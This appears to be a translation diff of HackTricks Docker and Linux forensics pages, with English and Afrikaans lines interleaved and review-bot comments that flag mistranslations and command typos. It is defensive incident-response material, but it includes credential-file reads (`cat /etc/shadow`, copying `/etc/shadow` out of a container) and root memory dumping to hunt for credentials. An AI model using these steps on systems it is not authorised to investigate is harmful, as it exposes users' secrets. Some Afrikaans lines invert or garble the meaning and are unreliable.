* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Container modification
There are suspicions that some docker container was compromised:
## Houer-wysiging
Daar is vermoedens dat 'n sekere Docker-houer gekompromitteer is:
```bash
docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
```
You can easily **find the modifications done to this container with regards to the image** with:
Jy kan maklik **die wysigings wat aan hierdie houer gedoen is met betrekking tot die prent** vind met:
```bash
docker diff wordpress
C /var
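Review bot: in the sentence under "Houer-wysiging" the Docker image is called "die prent" ("the picture"), which a reader will not connect with `docker diff` comparing the container against the image it was started from; use "beeld" ("met betrekking tot die beeld") and keep that one term for image throughout the file. The translated support block also renders "github repos" as "github-repos" while the other files in this commit use "github-opslag" and "GitHub-opslagplekke" for the same shared boilerplate; pick one rendering.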
@ -39,70 +36,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
A /var/lib/mysql/mysql/general_log.CSV
...
```
In the previous command **C** means **Changed** and **A,** **Added**.\
If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with:
In die vorige opdrag beteken **C** **Veranderd** en **A,** **Bygevoeg**.\
As jy vind dat 'n interessante lêer soos `/etc/shadow` gewysig is, kan jy dit van die houer aflaai om vir skadelike aktiwiteit te ondersoek met:
```bash
docker cp wordpress:/etc/shadow.
```
You can also **compare it with the original one** running a new container and extracting the file from it:
Jy kan dit ook **vergelyk met die oorspronklike een** deur 'n nuwe houer te hardloop en die lêer daaruit te onttrek:
```bash
docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
diff original_shadow shadow
```
If you find that **some suspicious file was added** you can access the container and check it:
As jy vind dat **'n verdagte lêer bygevoeg is**, kan jy toegang verkry tot die houer en dit nagaan:
```bash
docker exec -it wordpress bash
```
## Beeldwysigings
## Images modifications
When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
Wanneer jy 'n uitgevoerde docker-beeld (waarskynlik in `.tar`-formaat) ontvang, kan jy [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) gebruik om 'n opsomming van die wysigings te **onttrek**:
```bash
docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar
```
Then, you can **decompress** the image and **access the blobs** to search for suspicious files you may have found in the changes history:
Dan kan jy die prentjie **ontplooi** en **toegang verkry tot die blobs** om te soek na verdagte lêers wat jy dalk in die veranderingsgeskiedenis gevind het:
```bash
tar -xf image.tar
```
### Basiese Analise
### Basic Analysis
You can get **basic information** from the image running:
Jy kan **basiese inligting** kry van die lopende prentjie:
```bash
docker inspect <image>
docker inspect <image>
```
You can also get a summary **history of changes** with:
Jy kan ook 'n opsomming van die **geskiedenis van veranderinge** kry met:
```bash
docker history --no-trunc <image>
```
You can also generate a **dockerfile from an image** with:
Jy kan ook 'n **dockerfile van 'n prentjie** genereer met:
```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
### Duik
### Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
Om bygevoegde/gewysigde lêers in Docker-beelde te vind, kan jy ook die [**duik**](https://github.com/wagoodman/dive) (laai dit af vanaf [**vrystellings**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) nut gebruik:
```bash
#First you need to load the image in your docker repo
sudo docker load < image.tar 1 ⨯
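Review bot: two copy-paste defects in the command blocks survive into the translated file and should be fixed while this hunk rewrites the surrounding text: `docker cp wordpress:/etc/shadow.` lacks the space before the destination `.`, so Docker looks for a path `/etc/shadow.` inside the container instead of copying `/etc/shadow` into the current directory (it should read `docker cp wordpress:/etc/shadow .`), and `sudo docker load < image.tar 1 ⨯` still carries `1 ⨯`, a leftover of the author's shell prompt rather than part of the command. The trailing `>` in `dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>` is the same kind of residue. On the wording: "ontplooi" means deploy, not decompress ("uitpak" matches the `tar -xf` that follows); "basiese inligting kry van die lopende prentjie" says the image is running, whereas the English "from the image running:" means "by running" `docker inspect` against the image; and the tool name `dive` should not be translated to "Duik"/"duik" in the heading and link text (nor "releases" to "vrystellings"), since the reader has to find the tool under its real name.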
@ -111,33 +90,30 @@ Loaded image: flask:latest
#And then open it with dive:
sudo dive flask:latest
```
Dit stel jou in staat om **deur die verskillende blobs van Docker-beelde te blaai** en te kyk watter lêers gewysig/toegevoeg is. **Rooi** beteken toegevoeg en **geel** beteken gewysig. Gebruik **tab** om na die ander aansig te skuif en **spasie** om vouers in/uit te vou.
This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders.
With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\
You can decompress all the layers from an image from the directory where the image was decompressed executing:
Met die sal jy nie toegang tot die inhoud van die verskillende fases van die beeld hê nie. Om dit te doen, sal jy elke laag moet dekomprimeer en toegang daartoe hê.\
Jy kan al die lae van 'n beeld dekomprimeer vanuit die gids waar die beeld gedekomprimeer is deur die volgende uit te voer:
```bash
tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
## Legitieme inligting uit geheue
## Credentials from memory
Let daarop dat wanneer jy 'n docker-houer binne 'n gasheer uitvoer, **kan jy die prosesse wat op die houer loop vanaf die gasheer sien** deur eenvoudig `ps -ef` uit te voer.
Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory).
Daarom kan jy (as root) **die geheue van die prosesse uit die gasheer dump** en soek na **legitieme inligting** net [**soos in die volgende voorbeeld**](../../linux-hardening/privilege-escalation/#process-memory).
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil hê jou **maatskappy geadverteer moet word in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
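Review bot: the heading "## Legitieme inligting uit geheue" and the closing sentence "soek na **legitieme inligting**" translate "credentials" as "legitimate information", which changes the meaning of the section; use "geloofsbriewe" (or "aanmeldbesonderhede") in both places. "Met die sal jy nie toegang ... hê nie" also carries the source typo "With die" (for "With this") into Afrikaans; "Hiermee sal jy nie ..." is what the sentence means, and the English side could be corrected in the same hunk. Minor: "github-opslag" here versus "github-repos" in this file's top support block.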
@ -1,56 +1,52 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# Baseline
A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**.
'n Baselyn bestaan uit die neem van 'n oorsig van sekere dele van 'n stelsel om dit met 'n toekomstige status te **vergelyk om veranderinge te beklemtoon**.
For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\
This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
Byvoorbeeld, jy kan die has van elke lêer in die lêersisteem bereken en stoor om uit te vind watter lêers gewysig is.\
Dit kan ook gedoen word met die gebruikersrekeninge wat geskep is, prosesse wat loop, dienste wat loop en enige ander ding wat nie baie of glad nie moet verander nie.
## File Integrity Monitoring
## Lêerintegriteitsmonitering
File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps:
Lêerintegriteitsmonitering (FIM) is 'n kritieke sekuriteitstegniek wat IT-omgewings en data beskerm deur veranderinge in lêers te volg. Dit behels twee sleutelstappe:
1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications.
2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions.
1. **Baselynvergelyking:** Stel 'n baselyn vas deur lêereienskappe of kriptografiese kontrolesomme (soos MD5 of SHA-2) te gebruik vir toekomstige vergelykings om wysigings op te spoor.
2. **Real-Time Veranderingskennisgewing:** Kry onmiddellike waarskuwings wanneer lêers geopen of gewysig word, tipies deur bedryfstelsel-kerneluitbreidings.
## Tools
## Gereedskap
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
## References
## Verwysings
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
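Review bot: "jy kan die has van elke lêer in die lêersisteem bereken" has lost the word "hash" to "has"; write "die hash (kontrolesom) van elke lêer", consistent with "kriptografiese kontrolesomme" used in the FIM list below it. "2. **Real-Time Veranderingskennisgewing:**" is only half translated ("Intydse veranderingskennisgewing"), and "oorsig" for "snapshot" reads as "overview"; "momentopname" keeps the point-in-time sense that the later comparison depends on.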
@ -1,40 +1,36 @@
# Linux Forensics
# Linux Forensika
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
</details>
## Initial Information Gathering
## Aanvanklike Inligting Versameling
### Basic Information
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries:
### Basiese Inligting
Eerstens word dit aanbeveel om 'n **USB** te hê met **bekende goeie binêre en biblioteke daarop** (jy kan net Ubuntu kry en die _/bin_, _/sbin_, _/lib,_ en _/lib64_ lêers kopieer), monteer dan die USB en wysig die omgewingsveranderlikes om daardie binêre te gebruik:
```bash
export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
```
Once you have configured the system to use good and known binaries you can start **extracting some basic information**:
Sodra jy die stelsel gekonfigureer het om goeie en bekende binaire lêers te gebruik, kan jy begin met die **onttrekking van basiese inligting**:
```bash
date #Date and time (Clock may be skewed, Might be at a different timezone)
uname -a #OS info
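Review bot: "die _/bin_, _/sbin_, _/lib,_ en _/lib64_ lêers kopieer" calls the directories files; the English says "copy the folders", so "gidse" is needed (the `export PATH=/mnt/usb/bin:/mnt/usb/sbin` and `LD_LIBRARY_PATH` lines only make sense for whole directories). The Trickest banner translation also drops the bold markers that the English keeps around "automate workflows" and "most advanced", and the file alternates between "binêre" and "binaire lêers" for binaries; settle on one spelling.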
@ -52,51 +48,47 @@ cat /etc/passwd #Unexpected data?
cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
```
#### Verdagte inligting
#### Suspicious information
Terwyl jy die basiese inligting bekom, moet jy kyk vir vreemde dinge soos:
While obtaining the basic information you should check for weird things like:
* **Root prosesse** loop gewoonlik met lae PIDS, so as jy 'n root proses vind met 'n groot PID, kan jy vermoed
* Kyk na **geregistreerde aanmeldings** van gebruikers sonder 'n skulp binne `/etc/passwd`
* Kyk vir **wagwoordhasings** binne `/etc/shadow` vir gebruikers sonder 'n skulp
* **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect
* Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell
### Geheue Dump
### Memory Dump
To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
To **compile** it, you need to use the **same kernel** that the victim machine is using.
Om die geheue van die lopende stelsel te verkry, word dit aanbeveel om [**LiME**](https://github.com/504ensicsLabs/LiME) te gebruik.\
Om dit te **kompileer**, moet jy dieselfde kernel gebruik as die slagoffer se masjien.
{% hint style="info" %}
Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it
Onthou dat jy **nie LiME of enige ander ding** op die slagoffer se masjien kan installeer nie, aangesien dit verskeie veranderinge daaraan sal maak.
{% endhint %}
So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\
In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/<kernel version>` to your machine, and then **compile** LiME using them:
As jy 'n identiese weergawe van Ubuntu het, kan jy `apt-get install lime-forensics-dkms` gebruik.\
In ander gevalle moet jy [**LiME**](https://github.com/504ensicsLabs/LiME) van GitHub aflaai en dit met die korrekte kernelkoppele kompilleer. Om die presiese kernelkoppele van die slagoffer se masjien te verkry, kan jy eenvoudig die gids `/lib/modules/<kernel weergawe>` na jou masjien kopieer en dan LiME daarmee kompilleer:
```bash
make -C /lib/modules/<kernel version>/build M=$PWD
sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
```
LiME ondersteun 3 **formate**:
LiME supports 3 **formats**:
* Roh (elke segment saamgevoeg)
* Gepad (soortgelyk aan roh, maar met nulle in die regterbits)
* Lime (aanbevole formaat met metadata)
* Raw (every segment concatenated together)
* Padded (same as raw, but with zeroes in right bits)
* Lime (recommended format with metadata
LiME kan ook gebruik word om die dump **via die netwerk te stuur** in plaas daarvan om dit op die stelsel te stoor deur iets soos te gebruik: `path=tcp:4444`
LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
### Skyskaping
### Disk Imaging
#### Afskakeling
#### Shutting down
Eerstens, sal jy die stelsel moet **afskaal**. Dit is nie altyd 'n opsie nie, aangesien die stelsel soms 'n produksieserver kan wees wat die maatskappy nie kan bekostig om af te skaal nie.\
Daar is **2 maniere** om die stelsel af te skaal, 'n **normale afskakeling** en 'n **"trek die prop uit" afskakeling**. Die eerste een sal die **prosesse toelaat om soos gewoonlik te beëindig** en die **lêersisteem** om **gelyk te maak**, maar dit sal ook die moontlike **malware** toelaat om **bewyse te vernietig**. Die "trek die prop uit" benadering mag 'n **sekere verlies van inligting** meebring (nie baie van die inligting gaan verlore gaan nie aangesien ons reeds 'n beeld van die geheue geneem het nie) en die **malware sal geen geleentheid hê** om iets daaraan te doen nie. Daarom, as jy **vermoed** dat daar 'n **malware** mag wees, voer net die **`sync`** **opdrag** op die stelsel uit en trek die prop uit.
First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
#### Taking an image of the disk
It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information.
#### Neem 'n beeld van die skyf
Dit is belangrik om daarop te let dat **voordat jy jou rekenaar aan iets wat met die saak verband hou, koppel**, jy moet seker maak dat dit as **alleen-lees** gemonteer gaan word om enige inligting te verander.
```bash
#Create a raw copy of the disk
dd if=<subject device> of=<image file> bs=512
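Review bot: the sentence just before the `dd` block inverts the meaning: "jy moet seker maak dat dit as **alleen-lees** gemonteer gaan word om enige inligting te verander" says the read-only mount is there in order to modify information, while the English is "to avoid modifying any information"; it needs "om te voorkom dat enige inligting verander word". Several terms in this hunk are wrong rather than merely awkward: "afskaal" means scale down, not shut down ("afskakel"), "Skyskaping" is not a word for "Disk Imaging" ("Skyfbeelding"), the LiME formats "Roh" and "Gepad" should be "Rou" and "Opgevul", "kernelkoppele" for kernel headers should stay "kernel headers" or become "kernel-kopstukke", and the placeholder inside inline code was translated to `/lib/modules/<kernel weergawe>` while the code block keeps `make -C /lib/modules/<kernel version>/build M=$PWD`; placeholders in prose and code should match. The translated list does close the parenthesis that the English "Lime (recommended format with metadata" leaves open; the English side could get the same fix here.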
@ -105,35 +97,33 @@ dd if=<subject device> of=<image file> bs=512
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
### Voor-analise van skijfafbeelding
### Disk Image pre-analysis
Imaging a disk image with no more data.
Beeld 'n skijfafbeelding af sonder enige verdere data.
```bash
#Find out if it's a disk image using "file" command
file disk.img
file disk.img
disk.img: Linux rev 1.0 ext4 filesystem data, UUID=59e7a736-9c90-4fab-ae35-1d6a28e5de27 (extents) (64bit) (large files) (huge files)
#Check which type of disk image it's
img_stat -t evidence.img
img_stat -t evidence.img
raw
#You can list supported types with
img_stat -i list
Supported image format types:
raw (Single or split raw file (dd))
aff (Advanced Forensic Format)
afd (AFF Multiple File)
afm (AFF with external metadata)
afflib (All AFFLIB image formats (including beta ones))
ewf (Expert Witness Format (EnCase))
raw (Single or split raw file (dd))
aff (Advanced Forensic Format)
afd (AFF Multiple File)
afm (AFF with external metadata)
afflib (All AFFLIB image formats (including beta ones))
ewf (Expert Witness Format (EnCase))
#Data of the image
fsstat -i raw -f ext4 disk.img
fsstat -i raw -f ext4 disk.img
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext4
Volume Name:
Volume Name:
Volume ID: 162850f203fd75afab4f1e4736a7e776
Last Written at: 2020-02-06 06:22:48 (UTC)
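Review bot: "skijfafbeelding" in the heading "### Voor-analise van skijfafbeelding" and in "Beeld 'n skijfafbeelding af" is the Dutch spelling; Afrikaans is "skyfbeeld" ("Vooranalise van 'n skyfbeeld"). The sentence itself, "Beeld 'n skijfafbeelding af sonder enige verdere data", turns the already unclear English "Imaging a disk image with no more data" into an instruction to image the image; what the block that follows actually does is identify and inspect an image file with `file`, `img_stat` and `fsstat`, so a sentence saying that, on both sides, would serve the reader better.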
@ -162,42 +152,39 @@ r/r 16: secret.txt
icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Search for known Malware
## Soek na bekende Malware
### Modified System Files
### Gewysigde Sisteemlêers
Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files.
Linux bied gereedskap om die integriteit van sisteemkomponente te verseker, wat belangrik is om potensieel problematiese lêers op te spoor.
- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check.
- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues.
- **RedHat-gebaseerde stelsels**: Gebruik `rpm -Va` vir 'n omvattende ondersoek.
- **Debian-gebaseerde stelsels**: `dpkg --verify` vir aanvanklike verifikasie, gevolg deur `debsums | grep -v "OK$"` (nadat `debsums` geïnstalleer is met `apt-get install debsums`) om enige probleme te identifiseer.
### Malware/Rootkit Detectors
### Malware/Rootkit Detekteerders
|
||||
|
||||
Read the following page to learn about tools that can be useful to find malware:
|
||||
Lees die volgende bladsy om meer te wete te kom oor gereedskap wat nuttig kan wees om malware op te spoor:
|
||||
|
||||
{% content-ref url="malware-analysis.md" %}
|
||||
[malware-analysis.md](malware-analysis.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Search installed programs
|
||||
## Soek geïnstalleerde programme
|
||||
|
||||
To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories.
|
||||
Om doeltreffend te soek na geïnstalleerde programme op beide Debian- en RedHat-stelsels, oorweeg om stelsellogboeke en databasisse saam met handmatige kontroles in algemene gidslys te gebruik.
|
||||
|
||||
- For Debian, inspect **_`/var/lib/dpkg/status`_** and **_`/var/log/dpkg.log`_** to fetch details about package installations, using `grep` to filter for specific information.
|
||||
- Vir Debian, ondersoek **_`/var/lib/dpkg/status`_** en **_`/var/log/dpkg.log`_** om besonderhede oor pakketaanbringings te verkry, deur `grep` te gebruik om te filtreer vir spesifieke inligting.
|
||||
|
||||
- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages.
|
||||
|
||||
